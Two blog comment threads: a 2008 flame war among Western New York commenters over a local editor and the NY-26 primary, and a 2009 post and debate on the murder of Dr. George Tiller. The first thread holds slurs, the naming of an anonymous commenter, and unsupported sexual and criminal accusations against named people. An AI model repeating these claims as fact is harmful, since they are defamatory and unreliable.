what the powers/obama cult here in wny fail to take into account is the demographic. the average reporter reader — or those of the buffalo news or niagara gazette, for that matter — is over 60 years of age. there are more older people here than there are younger people. according to the u.s. census bureau, wny has one of the oldest demographics in the country. older people are more well read, and more likely to vote, than younger people. they’re also more conservative.
jackass smiles serves as an excellent example illustrating the point. my guess is single mother, around 30, overweight, stringy hair, basically unemployed, perhaps waiting for her “settlement.”
I can't find my bottle of listerine. August 17, 2008 at 8:45 am #
What’s the over/under on what time Buffalo Pundit writes a 1000 word essay on today’s Buffalo News article blasting Powers?
if it was any other day but sunday…..
Haterade August 17, 2008 at 9:47 am #
I find it funny that a guy from Cleveland of all places, who works at some free weekly in the wasteland of NF finds time to ridicule the “civilization” of Buffalo/ Buffalonians.
you think it’s funny? why, because you’re retarded? cleveland has major league baseball/football/basketball right downtown. buffalo has, um, the sabres? the cleveland museums of art & natural history are stuffed to the rafters with dinosaurs, rembrandts etc. buffalo has a gas station frank lloyd wright built and a “gallery” that was stripped of all it’s interesting pieces by a gang of brigands and vandals just last year, to the applause of the populace. cleveland has the plain dealer, one of the top 40 papers in the country by circulation, buffalo has the news, which is not. cleveland is a hub of great lakes shipping, buffalo allowed its harbor to silt up to the point where a tug boat can barely get in anymore. cleveland has an international airport where you can actually get on a plane and go to a foreign country that isn’t canada. the beatles played cleveland, buffalo got freddy and the dreamers. cleveland has the rock and roll hall of fame & museum, buffalo has, um, nothing. cleveland has the ritz-carleton, buffalo has the adams mark. cleveland has dennis kucinich and buffalo has, what’s his name again?
but to you hater, and people like you, buffalo new york is paris fucking france. try going somewhere sometime.
I’ve been to plenty of places Hudson … and always ended up here – my HOME. What brought YOU here – that high paying job at that crappy little free weekly ? And what KEEPS you here if it’s not up to your cosmopolitan standards ? All you do is bitch and complain. Why not just load up the 88 station wagon and head back to Cleveland ? Believe me … nobody would miss you.
alas, i cannot. exiled i am, condemned to spend eternity in this miserable hellhole, surrounded by ignorant peasants such as yourself. go suck on a wing, rube, or have one of them fancy coffees they serve down there to elmowood, and begin counting the days until the bills move to toronto.
Ah … I never thought I’d be so fortunate as to be lectured on class by a washed up singer of a third rate punk band from Cleveland. “Exiled” ? Nice try. C’mon wordsmith … what keeps you in this horrid place ? Come to think of it – you’re not even in Buffalo. Elmwood DOES look like Paris compared to NF !
if you ever got off of hertel you’d realize that anywhere you go, europe, asia, australia, wherever, people love niagara falls. when i left new york city i told johnny weed, johnny corona, same guy, that i was coming to the falls and he said, “niagara falls the resort?”
the last resort, i told him.
now go to new york city, l.a., tokyo or london and tell them you’re from buffalo. if you say it to an american they’ll laugh or ask if it snows much there. if you say it to a foreigner you’ll get a blank stare.
buffalo is a joke and has been since before you were born.
don’t kid yourself about the wny gulag, either. i met a guy from long island working in one of the banks here not too long ago and when he told me where he was from i asked how he fucked that up. his story was long and sad.
Red August 17, 2008 at 12:21 pm #
If Cleveland’s so great and you’re so smart, Hudson, why the hell aren’t you still there? It’s obvious that you have to hold your nose every time you step out into the street because of the malodorous stench of the Buffalo-Niagara area’s decomposition and all of the bullshit spewing out of our politicians. Of course our high-top, tight jeans, and mesh-shirt wearing populace is so far stuck in some sort of cultural bizzaro world that it’s a wonder you can even breathe the same air as us.
I remember a guy I used to work with that bitched every single day about what a miserable place we worked at, how it was run by fucking idiots and they were all out to get him and everyone there was stupid for putting up with the bullshit. Then he’d threaten to quit and move to Florida or New Orleans or Ted Kaczynski’s former cabin about every other week. Eventually I told him I’d buy him a shotgun or rent him a moving van, but either way I’d appreciate it if he just shut the fuck up. Becuase that’s all he was, all talk and no action.
Maybe when you get to Cleveland, Hudson, they can find a corner of the basement at the Rock and Roll Hall Of Fame for you to live in until you can find someone’s mother’s house to live in the basement of. Sheesh.
Haterade August 17, 2008 at 12:57 pm #
So you gauge an area on what the reaction of some random person is when you mention it ? Glad to hear that someone named “Johnny Weed” (what – couldn’t you find Jimmy Heroin or Billy Crack ?), thinks the Falls is a resort. The truth is Hudson, that as f*cked up as Buffalo is – it’s still better than the Falls, but that isn’t even the point. The question still remains : Why are you still here if it is so bad ?
go vote for jonny boy. he’ll make everything better. you’re right about the air though.
Haterade August 17, 2008 at 1:03 pm #
*****” …if you ever got off of hertel you’d realize that anywhere you go, europe, asia, australia, wherever, people love niagara falls”****
You must mean the actual falls themselves … and I’ll bet they’ve never actually BEEN there – or the American side anyway.
Answer the question. Why are you still in WNY ?
i like fucking your mother.
Red August 17, 2008 at 3:24 pm #
Hot damn, Hudson, that’s showing him. I can just see Haterade cringing in terror that you’re going to come up with another similarly witty rejoinder and destroy all of his self image.
Are you really that scared to answer the question? Or is it that you have some reason for sticking around this cesspool (your impression, not mine) that embarrasses you?
Good one Hudson. I could respond in kind, but I won’t. It just shows me what I already knew …
BTW , my mother doesn’t live in WNY !
… But my dad does – that’s probably more your speed anyhow.
Jon Splett August 17, 2008 at 4:11 pm #
Thread.
as i told the state board of elections official who subpoenaed me this week, what i do and why i do it is none of your goddamn business. red, you are apparently too embarrassed to even use your real name, as are hater and jackass. and i should answer to the anonymous likes of you?
this gets to the core dilemma of the “new media” and it’s non-reliability. if you couldn’t post your dimwitted musings anonymously, you wouldn’t post them at all and web entrepreneurs attempting to run sites such as this would lose even more money. but by allowing posters’ identities to remain hidden, cretins such as yourself seem suddenly to grow a set of balls that cause them to say things they wouldn’t dare say on a street corner.
like internet porn, it is all illusory though, and come tomorrow, if you’re lucky, you’ll go back to your shitty gig as a telephone bill collector or data entry droid dreaming of putting on your mask and cape later in the evening and doing battle against the evil forces that have thus far shown your candidate, jon powers, to be a money grubbing little twit who can’t even keep his mouth shut around the cops.
Use your investigative skills you picked up at the Pennysaver and find out my name hudson. It doesn’t take much as it’s all over this site !
Nice cop-out though.
Just answer the question …
Hudson … anything I posted I would say directly to your face. Any time.
I’m not a Powers fan, and don’t even live in his district.
Now answer the question as to why you stay here in WNY if it is soooo bad. It’s a very simple question, really.
why on earth would i want to know your name? or where your mother lives? you are as insignificant to me as the spider i just crushed for the sin of walking across my desk.
i am here on a mission, ok?
a mission from god.
You see Jon Splett, there’s a conflict in
every human heart between the rational and the irrational,
between good and evil. The good does not always triumph.
Sometimes the dark side overcomes what Lincoln called
the better angels of our nature. Every man has got a
breaking point. You and I have. Haterade has reached his.
And very obviously, he has gone insane.
Are you drunk Hudson ?
First, not knowing my name is reason enough for tap dancing around a pretty simple question – then you ask “why on earth would i want to know your name” ?
You curse and throw around juvenile insults – but I reached MY “breaking point” ?
You are a clown Hudson.
Hey Hudson, the name’s Brian McLaughlin. That good enough for you? Next you’ll say that there are lots of guys names that and what’s in a name? I’ve never made much of a secret of my name, though I’ve never thrown it around too much because more people call me “Red” than “Brian”, and if you care so goddam much there it is. Are we good now? Am I now allowed to comment on you complete refusal to answer a simple question?
Ah, but I see that you’re playing the usual holier-than-thou reporter’s game – “I don’t have to tell you shit ’cause I’m a reporter and I ask the questions around here.” What an idiotic game that is, but I guess it’s all we should expect from anyone of your apparent arrogance.
You expect everyone to answer to you, but don’t have the balls to answer a simple question. Nice.
haterade misses obvious references to “apocalypse now” and “the blues brothers,” direct quotes in fact, indicating a yawning cultural chasm simply too wide and deep to allow for communication to occur.
hi brian. i didn’t say i cared what your name is either. but there you are. nor did i ask you any questions about anything, which is why i thought it rather presumptuous for you or hater or anyone else to be asking me about my personal life.
but since we’re on a first name basis and all, i’ll tell you the fact is that i don’t leave wny now because i own a business here, not much of one in your view perhaps but a business nonetheless, which is worth a certain sum of money and — you see — and again whatever you might think of me personally, that business would be worth far less than it is now if i just up and left.
you’ll have to take my word on that, based on conversations i’ve had with my accountant, attorneys, potential investors etc. in plain english, leaving here would cost me a lot of money.
so i am faced with something of a conundrum, brian. i mean, i’ve got nearly nine years of my time and energy invested in this little candy store, and if i just walk away, well that wouldn’t be very satisfactory, not satisfactory at all.
so we travel a bit, the redhead and i, cleveland of course, detroit, toronto, boston, new york, seattle and the yukon territory in the past year alone. in september we’re going to the north woods of maine for two weeks, where i’ve hired a guide and a pack of tracking dogs to assist me in running down and killing one of their black bears, more common in those parts than big-haired blondes at the galleria, if you catch my drift. after that my new book “mob boss” will come out and then it will be back to cle for the rock hall thing.
we’re trying to decide whether we’d rather spend christmas in new york or new orleans. what do you think?
but you’re right. one day, and maybe sooner rather than later, i am going to have to decide. frankly, i hate the fact that money is playing a role in any decision i make.
but what can i do? i have a beautiful wife and five cats i’m responsible for, not to mention the taxman and certain other obligations (family) that i’d just as soon not get into if it’s all right by you.
anyway, brian, i’m glad we had this little chat. have you been to ireland yet? there isn’t a county on the island where you can throw a rock and not hit a mclaughlin. prior to coming here, i was in the lit crit racket with the irish echo in new york and came to know a printer, jack mclaughlin quite well.
no relation, i suppose.
Well, see now, Mike, that wasn’t so bad, was it? I mean, everyone’s worried about money I suppose. Just a simple question, as I thought; and a fairly relevant one what with the aspersions I’ve heard you cast over seemingly every aspect of this area. Oh, and I’d say it’s a pretty straightforward and satisfactory answer.
Never been to Ireland, though I may visit in the next year or so with my job. Maybe take my wife in a couple years, though we’d like to see a few other places, and my travel budget isn’t as high as yours seems to be.
The only McLaughlins (of the name) that I’m related to are here, and there’s all of 7 of us left. Family’s a big deal, which is why I probably won’t leave either. Maybe a vacation home in Florida, though I don’t particularly favor the heat and would rather just get a nice place out in the boonies near one of the lakes where I can piss right off the back porch without getting sued by a neighbor with binoculars. But this is home, for better or worse. I prefer to concentrate on the better, thanks, and get a little something done about the worse when I can.
Frankly, I don’t give a shit who wins the goddam election, because in the long run it’s not going to make a lick of difference to me or my family. But it’s something to see how everyone gets their panties in a bunch over an appearance ticket from 4 years ago, or whatever the latest horseshit is. I find it entertaining, to an extent, though slightly disturbing.
And hell, I got the over on the comments, too…
l the blame Aqua seafoam shame Sunburn with fre August 17, 2008 at 9:01 pm #
Is anyone sure that this is really Mike Hudson? why’s his site name link to BruceBattaglia.com, a fake site?
The Wizard August 17, 2008 at 11:36 pm #
Mike Hudson is out of fucking control!!! LOL.
Seriously Mike, don’t get too high on the bottle, but if you do, please stay away from the Gazette newsroom this time!!!
AND, I’m still waiting for proof of all these polls that you have access to that show Powers getting beaten badly. Just one poll please so I can stop asking. I cannot wait until Powers wins this god forsaken primary and you have egg all over your drunk face.
In Dante’s Inferno, Wiztard, a special punishment was reserved for diviners: their heads were permanently rotated to the rear, so those who in life sought to peer too far ahead into the future are condemned to study the past for all eternity.
jackson smiles August 18, 2008 at 5:41 am #
nice Hudson agains fails to back up anything.
Mike Hudson =s Fail.
The only poll he has is pitched in his pants while he jams away at his mom’s keyboard in the basement. Sober yet Hudson?
Mike August 18, 2008 at 9:49 am #
That is a fake shemp, Hudson would of kicked your ass by now.
Lenny Lenihan August 18, 2008 at 10:32 am #
I’m patiently waiting for this thread to end.
Let’s start chatting up about Illuzzi’s latest folly:
http://www.buffalonews.com/home/story/417195.html
“The district attorney, meanwhile, said then that he expected to quiz Web site owner Joseph J. Illuzzi about any dealings with the Paul Clark campaign or its representatives. Mullins claimed Peck financed the Internet campaign Illuzzi waged against Keane, who defeated Paul Clark in the Democratic primary.”
And Tim Clark’s involvement:
“The district attorney also said two key campaign officials— Roger J. Peck Jr. and Timothy M. Clark, the candidate’s brother and chairman of the Buffalo Niagara Film Commission, as well as the West Seneca Democratic Committee — are under scrutiny.”
Hudson and Haterade need to step away from the computer for about 10 to 12 hours.
hank August 18, 2008 at 10:33 am #
Mike H–Haterade’s real name is John Burke. Why he hides behind the handle when posting is beyond me.
He’s not leaving WNY, because he can’t get his lips off the state’s tit for his pay as an Adult Day-Care Center attendant–Oh I mean State Correction Officer.
But be easy on him, there’s no evidence he sells drugs on the side to the inmates, unlike many of his fellow officers.
He’s just you’re average WNY’er—Loves his Government created, union supported job, and he’s not goin’ anywhere that he might have to, you know, take a risk of personal financial capital to make a living.
Not his fault–he’s a victim of his environment.
John Burke August 18, 2008 at 10:48 am #
Thanks, Tubby ! Do I really “hide behind a handle” ? I mean … even a fat pseudo-redneck from NC knew my name, right ? Anyone who cares, or has been around this site for more than a few months already knew what it was …
I do realize that my job isn’t as important as selling air-fresheners at AutoZone like some bloated know-it-all “ex-pat”, but it is necessary. Remember when YOU were the (self-proclaimed of course) “toughest white boy” at your little podunk county jail ? Anyway, please entertain me with some name-dropping stories of your days in Riverside and at Joes. Please pepper them with plenty of “ya’lls” – it gives a nice folksy southern touch.
John Burke's co-worker August 18, 2008 at 11:00 am #
John hasn’t shown up for work in a couple of weeks.
He’s on “summer vacation” and is strategically using vacation time and sick time to stay away from the prison for most of the month of August.
Can’t say I blame him.
Selling drugs to inmates? Never happens. I swear.
Hank's 18 year-old manager August 18, 2008 at 11:04 am #
Get off the computer and straighten up the wax display Kazmarek ! Clean the bacon grease off the keyboard as well ! I told you I’d fire your fat ass next time !
Hank : I’m sorry sir . It wont happen again *sniff* (waddles away)…
thanks hank. an overpaid rent a cop. about what i figured.
The difference is Hudson … that if my “rent-a-cop” job was eliminated – there would be havoc in the streets. If your job was eliminated – would anyone even notice ?
You and Hank are perfect together. The only difference being that his bloated ass fled the coop before he decided to ridicule WNY, whereas you continue to stay here. I guess that makes you the dumber of the two – and that’s not an easy feat.
worried greece voter August 18, 2008 at 12:25 pm #
hey look —- The district attorney, meanwhile, said then that he expected to quiz Web site owner Joseph
J. Illuzzi about any dealings with the Paul Clark campaign or its representatives. Mullins claimed Peck financed the Internet campaign Illuzzi waged against Keane, who defeated Paul Clark in the Democratic primary.
—– that’s exactly what Eric Mullen is doing for Jack Davis through Buffalo Bean, Monroe Rising, and The Niagara Reporter —-
Eric Mullen's administrative assistant August 18, 2008 at 12:36 pm #
Sssshhhhh….. don’t let the secret get out.
Next thing you know McCarthy will be writing about it and Pundit will be blogging about it and Hardwick will be talking about it and then what will “Crazy Jack Davis” do to garner online support?
I wonder when Illuzzi is going to counter with a really crazy diatribe to defend himself. He’s got something up there now but it’s not that bizarre… for him.
hank August 18, 2008 at 12:57 pm #
Burke–How Obtuse are you?
I’ve invited you to my company website.
I’ve not worked in a retail auto parts store (where I was a General Manager) in over 10 years.
I’ve worked in 2 dealerships as Parts manager, and the last 3 years sitting at a computer handling commercial accounts for a specialty company.
Same position at the Geico Center in Amherst pays about 8.00/hr, I make over 17.00, WITH NO UNION DUES.
So that’s enough of the ‘fix the wax display”, ass munches.
I don’t work retail auto parts. When I did, I RAN the store, not fixing retail displays.
What’s it to you anyway? Ashamed to be an Adult Day Care Attendant?
It obviously pisses you off that I can make more money in NC without a Union than I can in WNY WITH a Union.
More alligator mouths overloading canary asses. Typical.
Crocodile lips and pigeon genitals August 18, 2008 at 1:10 pm #
I don’t care where Hank works.
I think a lot of other people reading this blog would agree with me.
Burke, Hank, anyone else who is involved: take it outside, or at least over to MySpace if you want to network and learn more about each other. Thanks.
hanks co-worker August 18, 2008 at 1:39 pm #
They used to call him 2 trip hank at the parts store, he never got the part right the first time for any customer. Thats why he’s behind the desk, less damage and he’s so fat now he wears a moo-moo.
John Burke aka Haterade August 18, 2008 at 1:47 pm #
Good stuff, co-worker … however I don’t want the finger pointed at me ! My part in this flamewar has now ended (but feel free to fight the good fight !).
moo-moo hank August 18, 2008 at 2:11 pm #
yup, we busted the union like i did when i sat on a lawn chair
Sam Walton August 18, 2008 at 2:26 pm #
i see that hank fella riding around my walmart stores on our motorized scooters we get for all the fat folks. fills the basket up with twinkies and pays with his benefit card.
Tom at Target August 18, 2008 at 2:52 pm #
No scooters in my stores. No siree Bob.
Glenn Gramigna August 18, 2008 at 3:25 pm #
Illuzzi makes people laugh:
http://twitter.com/briancbray
James Stockdale August 18, 2008 at 3:32 pm #
I wonder who H. Ross Perot supports?
Powers, Davis or Kryzan?
mike hudsons hooker August 18, 2008 at 4:05 pm #
Mike Hudson once paid me $ 50 to have sex with his mom while he watched.
He then went and had sex with a big photo of Jack Davis. It was gross.
He ate 12 twinkies afterwards
WNYDEM August 18, 2008 at 4:17 pm #
It’s Monday – where are the 990s?
Full Page Ad Parlato August 18, 2008 at 6:40 pm #
mike hudson Says:
and yet, somehow i manage to make money every week doing media, chris. my newspaper makes money, my books make money, my cd’s make money and, yes, even my web site turns a tidy profit. enitrely unlike wnymedia, a vanity project not unlike the high school key club.
http://steveouting.com/2008/07/05/responding-to-a-ticked-off-newspaper-editor/
On Jul 11, 2008, mike hudson said:
unfortunately, like just about everyone else in the newspaper business who has a website, i have yet to make a dime off it.
the only thing i cling to is money, and until you or someone else shows me how to make money on the internet without doing porn, the print edition of the paper will remain our first priority.
http://www.uttertrash.net/mikehudson.htm
UT: Were you able then to start make a living off of just music?
MH: No, never. But we did okay. None of us had jobs. Through all the years, ever since 1977, I don’t think I ever made more than $20,000 off the Pagans altogether.
Jake August 18, 2008 at 8:34 pm #
Holy smokes ! Domagalski and Wojtazek (sp?) look like the new Laurel & Hardy !
mike hudsons hooker August 19, 2008 at 1:51 am #
hudson f**ked a little boy
UT: Does it really just boil down to luck, or was there a point where you said to yourself, “This is destructive. I’ve got to get my shit together?”
MH: I still don’t have my shit together (laughs).
The Buffalo Bean » NY-26: Davis Reveals Jon Powers 2004 Citation for Disorderly Conduct - August 15, 2008
[…] Buffalo Pundit, complete with talking points from the Powers campaign, echoes the claim that the Republican Party fears going against Powers in November. I think it speaks for itself that […]
Buffalo Pundit » Blog Archive » Like Interpretive Dance - August 18, 2008
[…] Here’s a video interpretation of this thread. […]
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The Murderer
Via Andrew Sullivan, I am led to the conservative blog “Little Green Footballs“, which has posted information concerning the suspect who is alleged to have shot abortion provider Dr. George Tiller.
A couple of times I’ve predicted that we’ll see a return to the militia movement we had to put up with during the Clinton Administration. They’ll be even more energized now because we have a brown-skinned President. Scott Roeder, the suspect, posted to several Operation Rescue-related sites. But this is more disturbing:
July 7, Kansas: Scott Roeder is sentenced to sixteen months in state prison for parole violations following a 1996 conviction for having bomb components in his car trunk. Roeder, a sovereign citizen and tax protester, violated his parole by not filing tax returns or providing his social security number to his employer…
…The sovereign citizen movement is a network of American litigants who claim to be “sovereign citizens”; that is, people who claim to have certain rights under English common law and to be unaccountable to the federal government. The litigants advance this concept in opposition to “federal citizens” who, they believe, have unknowingly forfeited their rights by accepting some aspect of federal law.
This “sovereign citizen” concept originated in the Posse Comitatus movement as a teaching of Christian Identity minister William P. Gale. It has gone on to influence the tax protester movement, the Christian Patriot movement and the Redemption movement. Gale identified the Fourteenth Amendment to the United States Constitution as the act that converted sovereign citizens into federal citizens, but other commentators have identified other acts, including the Uniform Commercial Code,[2] the Emergency Banking Act,[2] the Zone Improvement Plan and the supposed suppression of the Titles of Nobility Amendment.
99.9% of what I’ve read on the right about this murder opposes it, but also gets in a shot about how bad Tiller was to perform procedures that his patients asked him to perform. The concern, however, is mostly about how poorly this will reflect on the entire anti-abortion movement in particular, and conservatives in general. The lunatic fringe at the Free Republic, (sorry, not linking), for the most part, cheered the murder of Dr. Tiller, and this is what Operation Rescue’s Randall Terry had to say:
“George Tiller was a mass-murderer. We grieve for him that he did not have time to properly prepare his soul to face God. I am more concerned that the Obama Administration will use Tiller’s killing to intimidate pro-lifers into surrendering our most effective rhetoric and actions. Abortion is still murder. And we still must call abortion by its proper name; murder.
Those men and women who slaughter the unborn are murderers according to the Law of God. We must continue to expose them in our communities and peacefully protest them at their offices and homes, and yes, even their churches.”
Ayman al-Zawahiri couldn’t have said it better. Perhaps Dick Cheney will come on the news and explain in graphic detail how we need to waterboard Mr. Roeder to find out his connection to some radical anti-abortion group. Isn’t that how it works nowadays when we’re dealing with terrorism?
Tags: abortion, militias, murder, News, Tea Party Movement
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39 Responses to “The Murderer”
Russell June 1, 2009 at 7:20 am #
It’s amazing how sick some people are and how some won’t miss the opportunity, even during a horrific tragedy, to press their political agenda. Call it what it was, a horrendous act by an ignorant and misguided individual. There is no need for Randall Terry to inject any of the politics on abortion into his statement and there is far less need for BP to throw in a political statement on waterboarding. I think the last paragraph of this post is just as disgusting as the two from Randall Terry, if not worse.
The Humanist June 1, 2009 at 7:37 am #
@ Russell The Torture Apologist – ” think the last paragraph of this post is just as disgusting as the two from Randall Terry, if not worse”.
Well, bully for you. Can you answer why Operation Rescue is not being investigated as a terror cell immediately after one of its active members commits a brazen act of terrorism against an American citizen?
Or do we have a lesser categorization in the GWOT when the terrorist looks like Larry the Cable Guy?
Haterade June 1, 2009 at 8:12 am #
@ Humanist
Was he an “active member of Operation Rescue” ?
Did you come to that conclusion because as BP posted, he “posted to several Operation Rescue-related sites” ?
If some poster here was arrested for some heinous crime – would that in some way implicate BP ?
I’m no big suppoerter of Operation Rescue and won’t get in to my personal feelings on abortion, but your attempt at making this about race (BP too for his little “brown-skinned President” line) pisses me off.
Jon Splett June 1, 2009 at 8:17 am #
@Russell- Sort of like using the tragedy of 9/11 to push through a political agenda like the Patriot Act?
@ Haterade – my “attempt to make this about race” pisses you off? Well….I’m all broken up over that.
I’m merely pointing out that the “GWOT” blowhards who are so quick to imagine Muslim terror cells in every neighborhood will now be quick to point out the “single gunman” theory of the anti-abortion “fringe”. And take pains to stress that we shouldn’t be jumping to conclusions and let the judicial process take its due course…all because the terrorist in our midst doesn’t look like Khalid Sheikh Muhammed.
Congratulations, BP, you just equated your own actions with those you’ve been railing against for years. You must be so proud of yourself, and self-hating at the same time.
Humanist, if there is a real link between the murderer and Operation Rescue, you should ask that question to President Obama and his Justice Department, not me.
I think FBI investigations, details from the 9/11 Commission, subsequent arrests, intelligence findings, thrawted attacks and piles of other evidence show the justifications for some of the actions taken by our government both domestically and internationally following 9/11. Not all, but some at least. When that kind of evidence piles up against this murderer, Operation Rescue and other groups on the fringe, then perhaps the public and our government will think and act similarly. Until then, there is no sense making comparisons. The two have nothing in common, unless you can present some evidence to the contrary.
LC Scotty June 1, 2009 at 10:11 am #
Since when did Ayman al-Zawahiri ever call for anything to be protested peacefully?
This is an act of terrorism, it needs to be investigated as such.
Mike In WNY June 1, 2009 at 10:22 am #
I don’t buy the terrorism argument, for this case or 9/11. Investigate the crimes and hold the people responsible. The terrorism label is redundant, inflammatory and too easily abused to strip people of rights and a fair trial. If 9/11 had been handled as a crime, we would probably not be facing a collapsing economy (at least not this soon) and thousands of American soldiers would not have died.
Jon Splett June 1, 2009 at 10:24 am #
@Russell- Evidence to the contrary….
http://thinkprogress.org/2007/10/13/warrantless-wiretapping-in-place-before-911/
Russell June 1, 2009 at 10:34 am #
Jon, how is that evidence to the contrary? It says W tried enacting some of those policies before 9/11. It has absolutely nothing to do with showing that this murderer acted with Operation Rescue or any other fringe group. What was your point supposed to be?
Mike, the terrorism label is not redundant. It’s a different situation if something is done solely to an individual or if it’s done to send a message of fear to a larger group. I believe it’s clear that this was an act of terror. I just don’t believe it was perpetrated by a group or a movement. I think it was the act of an individual.
It’s evidence contrary to your belief that the actions of our government following 9/11 were justified and not politically motivated.
But if you want evidence anti-abortion groups encourage this kind of bullshit,
http://www.armyofgod.com/POClist.html
There is a very real, very crazy group of Christo-facists in this country and they should be held just as accountable for their religious terrorism as Bin Laden.
Ok, third time I’m trying to post this and I think it’s getting blocked because it’s most definitely a link to a hate site and I’m betting the spam filter is catching that but….
1. My original link is evidence to the contrary that our government didn’t act to advance it’s political agenda following 9/11.
2. Groups like this (and I’m linking reddit which links to the site I’ve been trying to link) are Christo-fascists and should be prosecuted with the same vigor as Bin Laden.
http://www.reddit.com/r/atheism/comments/8opjc/well_i_guess_the_admin_of_this_fucked_up_website/
Haterade June 1, 2009 at 11:24 am #
Are you really the whiny little thing you come off as ?
Forgive me for not thinking that while henious, the murder of an abortion providing doctor hardly equates to the murder of 3000 + innocent Americans.
It was also convenient that you dismissed the bulk of my questions, so I’ll ask you again : Was the murderer an [B]”active member”[B] of operation rescue as you posted ?
hank June 1, 2009 at 11:30 am #
Abortionists are legally sanctioned murderers, thanks to the Supreme Court.
Murdering an abortionist is illegal, and always will be, as it should.
There are many anti-abortion whack-a-doos who embrace no other planks of Conservatism, so don’t shackle the right with these freaks. Code Pinkers don’t necessarily embrace all aspects of liberalism.
Violence (that Abortionists practice on the living yet unborn) begets violence(the bombings, and killing of doctors), but that doesn’t make either right or just.
Saying that the militia movement will increase because we have a “brown skinned President” is race baiting, and if there are any figures to support this, BP didn’t enlighten us, which is somewhat hypocritical.
Don’t forget, sometimes you get what you ask for.
@ Haterade—The answer to your question is YES.
He should go to a clinic and ask to assist in the performance of a late term abortion. He’d probably either puke his guts out, or faint away.
Those who are so “Pro Choice” should be sitting at the business end of the table pulling out the body parts a few hours a week. Minds would be changed.
The Humanist June 1, 2009 at 11:41 am #
@ Haterade – I don’t know…are you the touchy moron you come off as?
“Forgive me for not thinking that while henious(sic), the murder of an abortion providing doctor hardly equates to the murder of 3000 + innocent Americans.
Cheers…I’m sure Dr. Tiller’s family, friends and patients and the community he served are in total agreement with you. 9/11!! 9/11!!
“Was the murderer an “active member” of operation rescue as you posted ?”
Well, I don’t know if this psychopath’s membership card was renewed, but when he was arrested, he had a note with Operation Rescue’s phone number on it, as reported by KMBC in Kansas City. Purely coincidental, I’m sure.
I say he was an active member of Operation Rescue because he took action to eliminate a man OR has demonized, targeted, harassed and intimidated for three decades. This maniac achieved their aim, even though now they have the good sense, PR-wise, not to condone it.
@Hank- Code Pink is in no way, shape, or form the liberal equivalent of the anti-abortion fridge. They don’t drop bodies or hurt anyone. To make that analogy is retarded.
Yeah … I guess I’m as big a touchy moron as you are a whiny bitch.
Quite often you spout off without all the facts, and resort to name calling most of the time when people don’t agree with you. I would be more than happy to trade insults with you, but I’m sure nobody else wants to read that.
Jon, none of that is relevant to what I asked, but keep trying to cloud the subject and bring in other unrelated issues. I don’t know why that’s the game so many of you want to play with this murder. Clearly there is no evidence that links the actions of this murderer to Operation Rescue or any other group. Political statements on 9/11 and our government’s reaction or descriptions of fringe groups are completely irrelevant.
I’m sure Dr. Tiller’s family, friends, patients etc, aren’t happy. The loved ones of murder victims rarely are, but to equate this with 9/11 is wrong. What MikeinWNY said about investigating crimes and avoiding the terrorism “label” was right on target …. but then you wouldn’t be able to voice your phony outrage.
The Humanist June 1, 2009 at 12:04 pm #
@ Haterade – I resort to name calling? Who started it?
Haterade June 1, 2009 at 12:11 pm #
In this thread or in general ? In this thread you started out by calling Russell “the torture apologist”. Now unless this is some little pet name, I’d have to say it was YOU. I know it wasn’t directed at me, but it was name-calling nonetheless and shows your general demeanor regarding people you don’t agree with.
While I don’t post here nearly as much as you do, this isn’t my first day here. I have seen your act on numerous occasions, so let’s not play innocent.
Terry June 1, 2009 at 1:53 pm #
Curious..is the guy who just opened up at the recruiting center in Little Rock a terrorist or doesn’t he meet the definition??????
http://news.yahoo.com/s/ap/20090601/ap_on_re_us/us_recruiters_shot
The Humanist June 1, 2009 at 2:12 pm #
@ Haterade – define irony: being called out for being mean and discourteous by someone who’s screenname is “Haterade”
I’m sorry you took such offense to my name for Russell the Torture Apologist….you must have missed the numerous comment threads where he defends the Bush Administration’s use of torture….therefore, his name is Russell The Torture Apologist. He hasn’t objected so he must agree.
In any case, I didn’t call you a name until you started in with me….mess with the bull, etc. If you don’t like being called names, man up or go over to Ostrowski’s circle-jerk of a blog.
Russell June 1, 2009 at 2:41 pm #
Humanist, my objections to the way the term “torture” has been used and misrepresented on here are all over this site. Your pettiness and sophomoric behaviour is usually not worth engaging, but do not mistake that for acceptance.
Of course, you always have a justification for the way you act. As Haterade pointed out, your general demeanor regarding people you don’t agree with speaks volumes about yourself and the type of person you are.
And don’t humor yourself. You’re no bull, but you often spew plenty of it.
Jon Splett June 1, 2009 at 2:56 pm #
@Terry- Absolutely an act of terrorism and I’m the biggest anti-military person you’ll ever meet. Shooting up a recruiting station is just as hypocritical as calling yourself pro-life and shooting a doctor. If he shot recruiters to keep other people from enlisting, he’s a terrorist and should get treated as one.
@ Russell the Torture Apologist – like I said, apologizing for torture.
It certainly is rich to be accused of petty, sophmoric behavior by someone who posted all those “Jonny” Powers comments. I couldn’t care less what you think of me personally…people who defend torture are beneath my contempt.
Peter Farrell June 1, 2009 at 8:11 pm #
Interesting link that goes down the avenue Pundit brought up about a Democratic admininstration increasing the extremism from the right.
http://www.huffingtonpost.com/cristina-page/the-murder-of-dr-tiller-a_b_209562.html
“During the entire Bush administration, from 2000-2008 there were no murders.
During the Clinton era, between 1994-2000 there were 6 abortion providers and clinic staff murdered, and 17 attempted murders of abortion providers. There were 12 bombings or arsons during the Clinton years.
During the Bush administration, not only were there no murders, there were no attempted murders. There was one clinic bombing during the Bush years.”
@Humanist
Apparently you don’t know what Haterade is … google the term.
I didn’t “call you out for being mean and discourteous”, and if that’s the way you took it, let me clarify – I said you resort to name calling when someone has an opposite viewpoint. Mean ? Hardly. I would define it as more “bitchy” than “mean”.
Anyway, I have no problem throwing insults around, however I have learned that when you do it from the safety of your keyboard it really just makes you look like a juvenile coward. 9.9 times out of 10 those with the biggest e-muscles would not begin to say such things in ‘real life’. I am certain that you are not in the .1%.
“You mess with the bull … “??? In your case the axiom should end “you get the schitt”, because that’s what you are full of.
Larry Castellani June 1, 2009 at 11:07 pm #
@Haterade: re post #3, I think Operation Rescue qualifies to be investigated as a terrorist cell. There is a big difference between someone posting to BP’s site and then commiting a crime and someone posting to OR’s site and then commiting a murder possibly incited by the site whose purpose is to end abortion one way or another. BP is commited to discourse whereas OR is commited to inciting “actions” against abortion doctors and clinics.
@ Larry
The Humanist said that the murderer was an “active member” of operation rescue because of some phone number allegedly found in his possession.I was just questioning that statement.
Does operation rescue qualify for investigation as a terrorist cell ? I don’t know. Did they not condemn this act ?
@ Haterade – the drink of choice for haters….yes, I am down with the modern patois
Operation Rescue certainly deserves a fair share of scrutiny from the the criminal investigators in Kansas, if not some interest from the Justice Department. Their PR-minded condemnation today pales in comparison to their multi-decade campaign of harassment, intimidation, threats and obstruction while the good doctor was still alive and in practice.
